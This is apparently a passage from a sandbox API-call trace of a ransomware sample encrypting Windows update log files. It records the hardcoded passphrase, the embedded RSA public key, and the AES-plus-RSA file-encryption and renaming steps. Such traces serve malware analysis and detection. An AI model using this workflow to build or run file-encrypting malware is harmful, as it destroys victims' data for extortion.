(lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg")) returned 1 [0238.494] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl.fuck")) returned 0 [0238.494] CryptDestroyHash (hHash=0x282dfb8) returned 1 [0238.494] CryptDestroyKey (hKey=0x282ddf8) returned 1 [0238.494] CryptReleaseContext (hProv=0x28801f8, dwFlags=0x0) returned 1 [0238.495] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.495] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.495] GetLastError () returned 0x5 [0238.495] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl")) returned 0x2020 [0238.496] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl", dwFileAttributes=0x80) returned 0 [0238.496] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.497] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.497] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.498] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb10) returned 1 [0238.500] CryptCreateHash (in: hProv=0x287fb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.500] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.500] CryptHashData (hHash=0x282e2b8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.500] CryptDeriveKey (in: hProv=0x287fb10, Algid=0x6610, hBaseData=0x282e2b8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282ddf8) returned 1 [0238.500] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.500] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.501] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28801f8) returned 1 [0238.501] CryptImportPublicKeyInfo (in: hCryptProv=0x28801f8, dwCertEncodingType=0x1, pInfo=0x286bcf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286bd28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286bd30*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282dd38) returned 1 [0238.501] CryptEncrypt (in: hKey=0x282dd38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.501] CryptEncrypt (in: hKey=0x282dd38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880418*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880418*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.501] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880418*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880418*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.502] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.502] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.502] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.503] CloseHandle (hObject=0xffffffff) returned 1 [0238.503] CloseHandle (hObject=0x5d10) returned 1 [0238.507] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl"), bFailIfExists=0) returned 0 [0238.516] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl", dwFileAttributes=0x2000) returned 0 [0238.516] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl.gsg")) returned 1 [0238.518] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.010.etl.fuck")) returned 0 [0238.518] CryptDestroyHash (hHash=0x282e2b8) returned 1 [0238.518] CryptDestroyKey (hKey=0x282ddf8) returned 1 [0238.518] CryptReleaseContext (hProv=0x287fb10, dwFlags=0x0) returned 1 [0238.518] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.519] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.519] GetLastError () returned 0x5 [0238.519] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl")) returned 0x2020 [0238.519] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl", dwFileAttributes=0x80) returned 0 [0238.519] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.519] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.520] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.520] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb10) returned 1 [0238.523] CryptCreateHash (in: hProv=0x287fb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.523] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.523] CryptHashData (hHash=0x282dd78, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.523] CryptDeriveKey (in: hProv=0x287fb10, Algid=0x6610, hBaseData=0x282dd78, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282dfb8) returned 1 [0238.523] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.523] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.523] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28809f0) returned 1 [0238.524] CryptImportPublicKeyInfo (in: hCryptProv=0x28809f0, dwCertEncodingType=0x1, pInfo=0x286b408*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b438*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b440*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282def8) returned 1 [0238.524] CryptEncrypt (in: hKey=0x282def8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.524] CryptEncrypt (in: hKey=0x282def8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28804a0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28804a0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.524] WriteFile (in: hFile=0x5d10, lpBuffer=0x28804a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28804a0*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.525] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.525] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.525] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.525] CloseHandle (hObject=0xffffffff) returned 1 [0238.525] CloseHandle (hObject=0x5d10) returned 1 [0238.526] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl"), bFailIfExists=0) returned 0 [0238.531] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl", dwFileAttributes=0x2000) returned 0 [0238.531] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl.gsg")) returned 1 [0238.533] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.011.etl.fuck")) returned 0 [0238.533] CryptDestroyHash (hHash=0x282dd78) returned 1 [0238.533] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.533] CryptReleaseContext (hProv=0x287fb10, dwFlags=0x0) returned 1 [0238.533] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.533] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.533] GetLastError () returned 0x5 [0238.533] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl")) returned 0x2020 [0238.534] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl", dwFileAttributes=0x80) returned 0 [0238.535] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.535] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.535] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.536] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880528) returned 1 [0238.538] CryptCreateHash (in: hProv=0x2880528, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.538] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.538] CryptHashData (hHash=0x282e3f8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.538] CryptDeriveKey (in: hProv=0x2880528, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282df78) returned 1 [0238.538] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.538] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.538] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880858) returned 1 [0238.539] CryptImportPublicKeyInfo (in: hCryptProv=0x2880858, dwCertEncodingType=0x1, pInfo=0x286a638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a670*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e2b8) returned 1 [0238.539] CryptEncrypt (in: hKey=0x282e2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.539] CryptEncrypt (in: hKey=0x282e2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28805b0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28805b0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.539] WriteFile (in: hFile=0x5d10, lpBuffer=0x28805b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28805b0*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.540] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.540] CryptEncrypt (in: hKey=0x282df78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.540] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.540] CloseHandle (hObject=0xffffffff) returned 1 [0238.540] CloseHandle (hObject=0x5d10) returned 1 [0238.546] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl"), bFailIfExists=0) returned 0 [0238.549] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl", dwFileAttributes=0x2000) returned 0 [0238.549] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl.gsg")) returned 1 [0238.550] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.012.etl.fuck")) returned 0 [0238.551] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.551] CryptDestroyKey (hKey=0x282df78) returned 1 [0238.551] CryptReleaseContext (hProv=0x2880528, dwFlags=0x0) returned 1 [0238.551] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.551] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.551] GetLastError () returned 0x5 [0238.551] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl")) returned 0x2020 [0238.551] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl", dwFileAttributes=0x80) returned 0 [0238.551] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.552] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.552] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.552] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880528) returned 1 [0238.554] CryptCreateHash (in: hProv=0x2880528, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.554] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.554] CryptHashData (hHash=0x282dcf8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.555] CryptDeriveKey (in: hProv=0x2880528, Algid=0x6610, hBaseData=0x282dcf8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282dfb8) returned 1 [0238.555] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.555] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.555] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880638) returned 1 [0238.555] CryptImportPublicKeyInfo (in: hCryptProv=0x2880638, dwCertEncodingType=0x1, pInfo=0x286b0c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b0f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b100*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e278) returned 1 [0238.555] CryptEncrypt (in: hKey=0x282e278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.555] CryptEncrypt (in: hKey=0x282e278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28806c0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28806c0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.555] WriteFile (in: hFile=0x5d10, lpBuffer=0x28806c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28806c0*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.556] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.556] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.556] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.556] CloseHandle (hObject=0xffffffff) returned 1 [0238.556] CloseHandle (hObject=0x5d10) returned 1 [0238.557] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: 